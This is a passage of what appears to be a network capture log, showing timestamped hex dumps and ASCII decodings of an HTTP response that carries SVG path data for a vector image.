                                                                                                                                                                                                                                                                                        Data Ascii: 73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.75,217.52a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3006INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3022INData Raw: 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 30 2c 33 36 31 2e 32 31 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 39 2e 37 39 2c 33 35 34 2e 32 38 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: 2.86"/><path class="cls-4" d="M910,361.21a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M909.79,354.28a1.71,1.71,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3038INData Raw: 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 39 34 2c 32 33 35 2e 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 36 2e 37 2c 32 32 38 2e 37 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: 9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M926.94,235.7a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M926.7,228.76a1.72,1.72,0,0,1-.78,2.24,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3054INData Raw: 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 31 31 2c 31 37 30 2e 35 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 32 37 2e 33 34 2c 31 37 37 2e 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: 82"/><path class="cls-4" d="M1027.11,170.57a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M1027.34,177.4a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3070INData Raw: 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 31 30 2e 36 39 2c 33 30 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 39 37 2e 35 31 2c 31 31 36 2e 38 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33
                                                                                                                                                                                                                                                                                        Data Ascii: -.16-2.81"/><path class="cls-4" d="M1010.69,301a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"/><path class="cls-4" d="M997.51,116.88a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3086INData Raw: 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31 2e 30 39 2c 32 34 37 2e 33 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 38 31
                                                                                                                                                                                                                                                                                        Data Ascii: .37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M981.09,247.32a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M981
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3102INData Raw: 2c 31 38 36 2e 38 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 31 2e 34 39 2c 31 39 33 2e 36 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ,186.81a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"/><path class="cls-4" d="M951.49,193.64a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.39,2.39,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3118INData Raw: 30 2c 31 2d 32 2e 38 36 2c 30 41 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 39 32 32 2c 31 32 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 36 37 2c 31 33 33 2e 31 32 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 31 2e 39 2c 31 34 30 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-2.86,0A2.09,2.09,0,0,1,922,125"/><path class="cls-4" d="M921.67,133.12a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"/><path class="cls-4" d="M921.9,140a1.68,1.68,0,0,1,.76-2.2,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3134INData Raw: 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 30 35 2e 34 37 2c 32 37 30 2e 33 39 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 41 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 39 30 39 2c 32 37 32 61 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: 48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"/><path class="cls-4" d="M905.47,270.39a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.29.93A2.38,2.38,0,0,1,909,272a2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3150INData Raw: 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 36 35 2c 32 30 39 2e 38 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 35 2e 38 38 2c 32 31 36 2e 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                                        Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3166INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                                                        Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3182INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                                                        Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3198INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3214INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                                                        Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3230INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3246INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                                        Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:01 UTC3262INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
